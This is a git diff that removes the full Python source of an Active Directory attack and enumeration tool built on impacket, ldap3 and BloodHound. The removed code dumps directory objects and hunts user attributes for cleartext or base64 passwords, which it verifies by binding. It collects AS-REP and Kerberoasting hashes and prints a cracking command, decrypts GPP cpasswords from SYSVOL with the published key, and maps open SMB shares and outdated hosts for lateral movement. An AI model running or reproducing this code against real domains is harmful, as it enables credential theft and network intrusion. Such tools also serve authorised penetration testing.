warning: This module receives no new updates. Use pip package instead", UserWarning) - sys.exit(1) - - args = parser.parse_args() - - # If theres more than 4 sub'ed (test.test.domain.local) - tough luck sunny boy - domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$') - userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$') - - domainMatch = domainRE.findall(args.dc) - - if not domainMatch: - print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"') - sys.exit(1) - - if args.all: - args.smb = True - args.kerberos_preauth = True - args.bloodhound = True - args.spn = True - if args.no_creds: - args.user = False - else: - userMatch = userRE.findall(args.user) - if not userMatch: - print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "user@domain.local"') - sys.exit(1) - - - # Boolean flow control flags - file_to_write = None - if args.out_file: - file_to_write = args.out_file - - enumAD = EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.user) - - # Just print a blank line for output sake - print('') diff --git a/ade/__init__.py b/ade/__init__.py index 8ddf6ac..e69de29 100755 --- a/ade/__init__.py +++ b/ade/__init__.py @@ -1,832 +0,0 @@ -#!/usr/bin/env python3 -from ldap3 import Server, Connection, ALL, ALL_ATTRIBUTES, LEVEL, SUBTREE, ALL_OPERATIONAL_ATTRIBUTES -from progressbar import Bar, Percentage, ProgressBar, ETA -from ldap3.core.exceptions import LDAPKeyError, LDAPBindError, LDAPSocketOpenError -from impacket.smbconnection import SessionError -from impacket.nmb import NetBIOSTimeout, NetBIOSError -from getpass import getpass -from termcolor import colored -from impacket import smbconnection -from impacket.dcerpc.v5 import srvs -import contextlib, argparse, sys, socket, json, re, os, base64 -from Cryptodome.Cipher import AES -from dns.resolver 
import NXDOMAIN -import textwrap - -# Thanks SecureAuthCorp for GetNPUsers.py -# For Kerberos preauthentication -from impacket.krb5 import constants -from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter -from impacket.krb5.kerberosv5 import sendReceive, KerberosError -from impacket.krb5.types import KerberosTime, Principal -from pyasn1.codec.der import decoder, encoder -from pyasn1.type.univ import noValue -from binascii import hexlify -import datetime -import random -from .modEnumerator.modEnumerator import ModEnumerator -from .connectors.connectors import Connectors - -# Thanks SecureAuthCorp for GetUserSPNs.py -# For SPN enum -from impacket.krb5.ccache import CCache -from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS -from impacket.ntlm import compute_lmhash, compute_nthash -from impacket.krb5.asn1 import TGS_REP - -from bloodhound import BloodHound, resolve_collection_methods -from bloodhound.ad.domain import AD -from bloodhound.ad.authentication import ADAuthentication - - -class EnumAD(): - - def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, dryrun, domuser=None): - self.server = domainController - self.domuser = domuser - self.ldaps = ldaps - self.output = output - self.bhout = bhout - self.kpre = kpre - self.spnEnum = spnEnum - self.enumsmb = enumsmb - self.searchSysvol = searchSysvol - - self.ou_structure = domainController.split('.') - self.dc_string='' - for element in self.ou_structure: - self.dc_string += 'dc={},'.format(element) - - # LDAP properties - # At the moment we just want everything - self.ldapProps = ["*"] - - # Initialize modules - self.connectors = Connectors() - self.enumerator = ModEnumerator() - - - # Setting lists containing elements we want from the domain controller - self.computers = [] - self.people = [] - self.groups = [] - self.spn = [] - self.acl = [] - self.gpo = [] - self.domains = [] - self.ous = [] - 
self.deletedUsers = [] - self.passwd = False - self.passwords = {} - # Holds the values of servers that has been fingerprinted to a particular service - self.namedServers = {} - - # TODO: Figure a good way to go through the code dryrun - if dryrun: - print(self.server, self.domuser, self.ldaps, self.output, self.bhout, self.kpre, self.spnEnum, self.enumsmb, self.searchSysvol, self.ou_structure, self.dc_string) - return - - if domuser is not False: - self.runWithCreds() - else: - self.runWithoutCreds() - - self.enumDeleted() - self.enumerate_names() - self.checkForPW() - self.checkOS() - self.write_file() - - # Unbind the connection to release the handle - self.conn.unbind() - - - def runWithCreds(self): - self.CREDS = True - if not self.passwd: - self.passwd = str(getpass()) - self.bind() - self.search() - - if self.output: - self.write_file() - - if self.searchSysvol: - self.checkSYSVOL() - - if self.bhout: - self.outputToBloodhoundJson() - - if self.kpre: - self.enumKerbPre() - - if self.spnEnum: - self.enumSPNUsers() - - if self.enumsmb: - # Setting variables for further testing and analysis - self.smbShareCandidates = [] - self.smbBrowseable = {} - self.sortComputers() - self.enumSMB() - - # Lets clear variable now - self.passwd = None - - return - - - def runWithoutCreds(self): - self.CREDS = False - print('[ ' + colored('INFO', 'green') + ' ] Attempting to get objects without credentials') - self.passwd = '' - self.domuser = '' - print('') - - self.bind() - self.search() - - self.enumForCreds(self.people) - - return - - @contextlib.contextmanager - def suppressOutput(self): - with open(os.devnull, 'w') as devnull: - with contextlib.redirect_stderr(devnull) as err, contextlib.redirect_stdout(devnull) as out: - yield (err, out) - - - def enumDeleted(self): - if len(self.deletedUsers) > 0: - print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users') - self.enumForCreds(self.deletedUsers) - - - def testExploits(self): - from .exploits 
import exploits - print('[ ' + colored('INFO', 'green') +' ] Attempting to run imbedded exploits...') - exp = exploits.Exploits() - exp.run(self.server, self.computers[0]["name"]) - - if len(exp.vulnerable) > 0: - cves = "" - for exploit in exp.vulnerable: - cves += f"{exploit}, " - print('[ ' + colored('WARN', 'yellow') + f' ] DC may be vulnerable to: [ ' + colored(cves[:-2], 'green') + ' ]') - else: - print('[ ' + colored('OK', 'green') + ' ] DC not vulnerable to included exploits') - - - def bind(self): - try: - if self.ldaps: - self.conn = self.connectors.ldap_connector(self.server, True, self.domuser, self.passwd) - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAPS server: {0}'.format(self.server)) - else: - self.conn = self.connectors.ldap_connector(self.server, False, self.domuser, self.passwd) - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAP server: {0}'.format(self.server)) - # TODO: Catch individual exceptions instead - except (LDAPBindError, LDAPSocketOpenError): - if self.ldaps: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.server)) - else: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.server)) - sys.exit(1) - - - def search(self): - # Get computer objects - self.conn.search(self.dc_string[:-1], '(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.computers.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Computer objects') - - # Get person objects - self.conn.search(self.dc_string[:-1], '(objectCategory=person)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.people.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Person objects') - - # Get group objects - self.conn.search(self.dc_string[:-1], 
'(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)(primarygroupid=*))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.groups.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Group objects') - - # Get SPN objects - self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(serviceprincipalname=*))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.spn.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all SPN objects') - - # Get ACL objects - self.conn.search(self.dc_string[:-1], '(|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)(samAccountType=268435457)(samAccountType=536870912)(samAccountType=536870913)(objectClass=domain)(&(objectcategory=groupPolicyContainer)(flags=*))(objectcategory=organizationalUnit))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.acl.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all ACL objects') - - # Get GPO objects - self.conn.search(self.dc_string[:-1], '(|(&(&(objectcategory=groupPolicyContainer)(flags=*))(name=*)(gpcfilesyspath=*))(objectcategory=organizationalUnit)(objectClass=domain))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.gpo.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all GPO objects') - - # Get Domain - self.conn.search(self.dc_string[:-1], '(objectclass=domain)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.domains.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Domains') - - # Get OUs - self.conn.search(self.dc_string[:-1], '(objectclass=organizationalUnit)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.ous.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all OUs') - - # Get 
deleted users - self.conn.search(self.dc_string[:-1], '(objectclass=user)', attributes=self.ldapProps, search_scope=SUBTREE, controls=[('1.2.840.113556.1.4.417', True, None)]) - for entry in self.conn.entries: - self.deletedUsers.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all deleted users') - if len(self.deletedUsers) > 0: - print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users') - self.enumForCreds(self.deletedUsers) - - - def enumerate_names(self): - self.namedServers = self.enumerator.enumerate_server_names(self.computers) - - - ''' - Since it sometimes is real that the property 'userPassword:' is set - we test for it and dump the passwords - ''' - def checkForPW(self): - passwords = self.enumerator.enumerate_for_cleartext_passwords(self.people, self.server) - self.passwords = { **passwords, **self.passwords } - - if len(self.passwords.keys()) > 0: - with open(f'{self.output}-clearpw', 'w') as f: - json.dump(self.passwords, f, sort_keys=False) - - if len(self.passwords.keys()) == 1: - print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text password'.format(len(self.passwords.keys()))) - elif len(self.passwords.keys()) == 0: - print('[ ' + colored('OK', 'green') +' ] Found {0} clear text password'.format(len(self.passwords.keys()))) - else: - print('[ ' + colored('OK', 'green') +' ] Found {0} clear text passwords'.format(len(self.passwords.keys()))) - - - ''' - While it is not unusual to find EOL servers hidden or forgotten these - often makes easier targets for lateral movemen, and because of that - we'll dump the lowest registered OS and the respective hosts for easier - enumeration afterwards - ''' - def checkOS(self): - os_json = self.enumerator.enumerate_os_version(self.computers) - - for key, value in os_json.items(): - if len(value) == 0: - continue - with open(f'{self.output}-oldest-OS', 'w') as f: - for item in value: - f.write('{0}: {1}\n'.format(key, item)) - break - - print('[ ' + 
colored('OK', 'green') + f' ] Wrote hosts with oldest OS to {self.output}-oldest-OS') - - - def checkSYSVOL(self): - print('[ .. ] Searching SYSVOL for cpasswords\r') - cpasswords = {} - try: - smbconn = self.connectors.smb_connector(self.server, self.domuser, self.passwd) - dirs = smbconn.listShares() - for share in dirs: - if str(share['shi1_netname']).rstrip('\0').lower() == 'sysvol': - path = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') - paths = [e.get_shortname() for e in path if len(e.get_shortname()) > 2] - for dirname in paths: - try: - # Dont want . or .. - subPath = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), str(dirname) + '\\*') - for sub in subPath: - if len(sub.get_shortname()) > 2: - paths.append(dirname + '\\' + sub.get_shortname()) - except (SessionError, UnicodeEncodeError, NetBIOSError) as e: - continue - - # Compile regexes for username and passwords - cpassRE = re.compile(r'cpassword=\"([a-zA-Z0-9/]+)\"') - unameRE = re.compile(r'userName|runAs=\"([ a-zA-Z0-9/\(\)-]+)\"') - - # Prepare the ciphers based on MSDN article with key and IV - cipher = AES.new(bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'), AES.MODE_CBC, bytes.fromhex('00' * 16)) - - # Since the first entry is the DC we dont want that - for item in paths[1:]: - if '.xml' in item.split('\\')[-1]: - with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'wb') as f: - smbconn.getFile(str(share['shi1_netname']).rstrip('\0'), item, f.write) - with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'r') as f: - try: - fileContent = f.read() - passwdMatch = cpassRE.findall(str(fileContent)) - for passwd in passwdMatch: - unameMatch = unameRE.findall(str(fileContent)) - for usr in unameMatch: - padding = '=' * (4 - len(passwd) % 4) - # For some reason, trailing nul bytes were on each character, so we remove any if they are there - cpasswords[usr] = cipher.decrypt(base64.b64decode(bytes(passwd 
+ padding, 'utf-8'))).strip().decode('utf-8').replace('\x00', '') - except (UnicodeDecodeError, AttributeError) as e: - # Remove the files we had to write during the search - os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) - continue - - # Remove the files we had to write during the search - os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) - - if len(cpasswords.keys()) > 0: - with open('{0}-cpasswords.json'.format(self.server), 'w') as f: - json.dump(cpasswords, f) - - if len(cpasswords.keys()) == 1: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpassword in a GPO on SYSVOL share'.format(len(cpasswords.keys()))) - else: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpasswords in GPOs on SYSVOL share'.format(len(cpasswords.keys()))) - - - except (SessionError, UnicodeEncodeError, NetBIOSError): - print('[ ' + colored('ERROR', 'red') + ' ] Some error occoured while searching SYSVOL') - else: - smbconn.close() - - - def splitJsonArr(self, arr): - if isinstance(arr, list): - if len(arr) == 1: - return arr[0] - return arr - - - def outputToBloodhoundJson(self): - print('[ ' + colored('OK', 'green') +' ] Generating BloodHound output - this may take time...') - try: - with self.suppressOutput(): - opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server) - auth = ADAuthentication(username=self.domuser, password=self.passwd, domain=self.server) - try: - ad = AD(auth=auth, domain=self.server, nameserver=None, dns_tcp=False) - ad.dns_resolve(kerberos=False, domain=self.server, options=opts) - except (NXDOMAIN) as e: - # So we didnt succeed with DNS lookup. 
Most likely an internal, so lets try to point to the DC - print('[ ' + colored('WARN', 'yellow') +' ] DNS lookup of Domain Controller failed - attempting to set the DC as Nameserver') - try: - ns = socket.gethostbyname(self.server) - opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server, nameserver=ns) - ad = AD(auth=auth, domain=self.server, nameserver=ns, dns_tcp=False) - ad.dns_resolve(kerberos=False, domain=self.server, options=opts) - except (NXDOMAIN) as e: - # I'm all out of luck - print('[ ' + colored('ERROR', 'red') +' ] DNS lookup of Domain Controller failed with DC as nameserver') - exit(1) - with self.suppressOutput(): - bloodhound = BloodHound(ad) - bloodhound.connect() - collection = resolve_collection_methods('Session,Trusts,ACL,DCOM,RDP,PSRemote') - bloodhound.run(collect=collection, num_workers=40, disable_pooling=False) - print('[ ' + colored('OK', 'green') +' ] BloodHound output generated') - except Exception as e: - print('[ ' + colored('ERROR', 'red') + f' ] Generating BloodHound output failed: {e}') - - - def sortComputers(self): - for computer in self.computers: - try: - self.smbShareCandidates.append(computer['dNSHostName']) - except LDAPKeyError: - # No dnsname registered - continue - if len(self.smbShareCandidates) == 1: - print('[ ' + colored('OK', 'green') +' ] Found {0} dnsname'.format(len(self.smbShareCandidates))) - else: - print('[ ' + colored('OK', 'green') +' ] Found {0} dnsnames'.format(len(self.smbShareCandidates))) - - - def enumSMB(self): - progBar = ProgressBar(widgets=['SMBConnection test: ', Percentage(), Bar(), ETA()], maxval=len(self.smbShareCandidates)).start() - prog = 0 - try: - for dnsname in self.smbShareCandidates: - try: - # Changing default timeout as shares should respond withing 5 seconds if there is a share - # and ACLs make it available to self.user with self.passwd - smbconn = self.connectors.smb_connector(self.server, self.domuser, self.passwd) - dirs = smbconn.listShares() - 
self.smbBrowseable[str(dnsname)] = {} - for share in dirs: - self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = '' - try: - _ = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') - self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = True - except (SessionError, UnicodeEncodeError, NetBIOSError): - # Didnt have permission, all good - # Im second guessing the below adding to the JSON file as we're only interested in the listable directories really - #self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = False - continue - smbconn.logoff() - progBar.update(prog + 1) - prog += 1 - except (socket.error, NetBIOSTimeout, SessionError, NetBIOSError): - # TODO: Examine why we sometimes get: - # impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE - # on healthy shares. It seems to be reported with CIF shares - progBar.update(prog + 1) - prog += 1 - continue - except ValueError: - # We reached end of progressbar, continue since we finish below - pass - progBar.finish() - print('') - - availDirs = [] - for key, value in self.smbBrowseable.items(): - for _, v in value.items(): - if v: - availDirs.append(key) - - if len(self.smbShareCandidates) == 1: - print('[ ' + colored('OK', 'green') + ' ] Searched {0} share and {1} share with {2} subdirectories/files is browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser)) - else: - print('[ ' + colored('OK', 'green') + ' ] Searched {0} shares and {1} shares with {2} subdirectories/file sare browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser)) - if len(self.smbBrowseable.keys()) > 0: - with open('{0}-open-smb.json'.format(self.server), 'w') as f: - json.dump(self.smbBrowseable, f, indent=4, sort_keys=False) - print('[ ' + colored('OK', 'green') + ' ] Wrote browseable shares to 
{0}-open-smb.json'.format(self.server)) - - - - def write_file(self): - with open(str(self.output) + '-computers', 'w') as f: - for item in self.computers: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-people', 'w') as f: - for item in self.people: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-groups', 'w') as f: - for item in self.groups: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-spn', 'w') as f: - for item in self.spn: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-acl', 'w') as f: - for item in self.acl: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-gpo', 'w') as f: - for item in self.gpo: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-domains', 'w') as f: - for item in self.domains: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-ous', 'w') as f: - for item in self.ous: - f.write(str(item)) - f.write("\n") - - print('[ ' + colored('OK', 'green') +' ] Wrote all files to {0}-obj_name'.format(self.output)) - - - def enumKerbPre(self): - # Build user array - users = [] - self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - users.append(str(entry['sAMAccountName']) + '@{0}'.format(self.server)) - if len(users) == 0: - print('[ ' + colored('OK', 'green') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) - elif len(users) == 1: - print('[ ' + colored('OK', 'yellow') +' ] Found {0} account that does not require Kerberos preauthentication'.format(len(users))) - else: - print('[ ' + colored('OK', 'yellow') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) - - hashes = [] - # Build request for Tickets - for usr in users: - clientName = Principal(usr, 
type=constants.PrincipalNameType.NT_PRINCIPAL.value) - asReq = AS_REQ() - domain = str(self.server).upper() - serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value) - pacReq = KERB_PA_PAC_REQUEST() - pacReq['include-pac'] = True - encodedPacReq = encoder.encode(pacReq) - asReq['pvno'] = 5 - asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value) - asReq['padata'] = noValue - asReq['padata'][0] = noValue - asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value) - asReq['padata'][0]['padata-value'] = encodedPacReq - - requestBody = seq_set(asReq, 'req-body') - - options = list() - options.append(constants.KDCOptions.forwardable.value) - options.append(constants.KDCOptions.renewable.value) - options.append(constants.KDCOptions.proxiable.value) - requestBody['kdc-options'] = constants.encodeFlags(options) - - seq_set(requestBody, 'sname', serverName.components_to_asn1) - seq_set(requestBody, 'cname', clientName.components_to_asn1) - - requestBody['realm'] = domain - - now = datetime.datetime.utcnow() + datetime.timedelta(days=1) - requestBody['till'] = KerberosTime.to_asn1(now) - requestBody['rtime'] = KerberosTime.to_asn1(now) - requestBody['nonce'] = random.getrandbits(31) - - supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),) - - seq_set_iter(requestBody, 'etype', supportedCiphers) - - msg = encoder.encode(asReq) - - try: - response = sendReceive(msg, domain, self.server) - except KerberosError as e: - if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value: - supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),) - seq_set_iter(requestBody, 'etype', supportedCiphers) - msg = encoder.encode(asReq) - response = sendReceive(msg, domain, self.server) - else: - print(e) - continue - - asRep = decoder.decode(response, asn1Spec=AS_REP())[0] - - 
hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())) - - if len(hashes) > 0: - with open('{0}-jtr-hashes'.format(self.server), 'w') as f: - for h in hashes: - f.write(str(h) + '\n') - - print('[ ' + colored('OK', 'yellow') +' ] Wrote all hashes to {0}-jtr-hashes'.format(self.server)) - else: - print('[ ' + colored('OK', 'green') +' ] Got 0 hashes') - - - def enumSPNUsers(self): - users_spn = { - } - user_tickets = { - } - - userDomain = self.domuser.split('@')[1] - - idx = 0 - for entry in self.spn: - spns = json.loads(self.spn[idx].entry_to_json()) - users_spn[self.splitJsonArr(spns['attributes'].get('name'))] = self.splitJsonArr(spns['attributes'].get('servicePrincipalName')) - idx += 1 - - # Get TGT for the supplied user - client = Principal(self.domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value) - try: - # We need to take the domain from the user@domain since it *could* be a cross-domain user - tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(self.passwd), compute_nthash(self.passwd), None, kdcHost=None) - - TGT = {} - TGT['KDC_REP'] = tgt - TGT['cipher'] = cipher - TGT['sessionKey'] = newSession - - for user, spn in users_spn.items(): - if isinstance(spn, list): - # We only really need one to get a ticket - spn = spn[0] - else: - try: - # Get the TGS - serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value) - tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']) - # Decode the TGS - decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0] - # Get different encryption types - if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value: - entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], 
spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value: - entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value: - entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value: - entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) - user_tickets[spn] = entry - - except KerberosError: - # For now continue - # TODO: Maybe look deeper into issue here - continue - - if len(user_tickets.keys()) > 0: - with open('{0}-spn-tickets'.format(self.server), 'w') as f: - for key, value in user_tickets.items(): - f.write('{0}:{1}\n'.format(key, value)) - if len(user_tickets.keys()) == 1: - print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} ticket for Kerberoasting. 
Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) - else: - print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} tickets for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) - else: - print('[ ' + colored('OK', 'green') +' ] Got {0} tickets for Kerberoasting'.format(len(user_tickets.keys()))) - - - except KerberosError as err: - print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1])) - - - def enumForCreds(self, ldapdump): - searchTerms = [ - 'legacy', 'pass', 'password', 'pwd', 'passcode' - ] - excludeTerms = [ - 'badPasswordTime', 'badPwdCount', 'pwdLastSet', 'legacyExchangeDN' - ] - possiblePass = {} - idx = 0 - for _ in ldapdump: - user = json.loads(ldapdump[idx].entry_to_json()) - for prop, value in user['attributes'].items(): - if any(term in prop.lower() for term in searchTerms) and not any(ex in prop for ex in excludeTerms): - try: - possiblePass[user['attributes']['userPrincipalName'][0]] = value[0] - except KeyError: - # Could be a service user instead - try: - possiblePass[user['attributes']['servicePrincipalName'][0]] = value[0] - except KeyError: - # Don't know which type - continue - - idx += 1 - if len(possiblePass) > 0: - print('[ ' + colored('INFO', 'green') +' ] Found possible password in properties') - print('[ ' + colored('INFO', 'green') +' ] Attempting to determine if it is a password') - - for user, password in possiblePass.items(): - try: - usr, passwd = self.entroPass(user, password) - except TypeError: - # None returned, just continue - continue - if not self.CREDS: - self.domuser = usr - self.passwd = passwd - self.passwords[usr] = passwd - self.runWithCreds() - return - - - def entroPass(self, user, password): - if not password: - return None - # First check if it is a clear text - dc_test_conn = Server(self.server, get_info=ALL) - test_conn = 
Connection(dc_test_conn, user=user, password=password) - test_conn.bind() - # Validate the login (bind) request - if int(test_conn.result['result']) != 0: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible clear text password'.format(user, password)) - else: - print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not cleartext'.format(user, password)) - else: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property'.format(user, password)) - else: - print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property - continuing with these creds'.format(user, password)) - print('') - return user, password - - test_conn.unbind() - - # Attempt for base64 - # Could be base64, lets try - try: - pw = base64.b64decode(bytes(password, encoding='utf-8')).decode('utf-8') - except base64.binascii.Error: - return None - - # Attempt decoded PW - dc_test_conn = Server(self.server, get_info=ALL) - test_conn = Connection(dc_test_conn, user=user, password=pw) - test_conn.bind() - # Validate the login (bind) request - if int(test_conn.result['result']) != 0: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible base64 decoded password'.format(user, pw)) - else: - print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not base64 encoded'.format(user, pw)) - else: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property'.format(user, pw)) - else: - print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw)) - print('') - return user, pw - - - - -def main(args): - parser = argparse.ArgumentParser(prog='ade', formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(''' - ___ __ _ 
____ _ __ ______ - / | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___ - / /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\ - / ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / / - /_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/ - /____/ - - /*----------------------------------------------------------------------------------------------------------*/ - - ''')) - - parser.add_argument('--dc', type=str, help='Hostname of the Domain Controller') - parser.add_argument('-o', '--out-file', type=str, help='Name prefix of output files (default: the name of the dc)') - parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `user@domain.org`') - parser.add_argument('-s', '--secure', help='Try to estalish connection through LDAPS', action='store_true') - parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true') - parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that does not require Kerberos preauthentication', action='store_true') - parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by 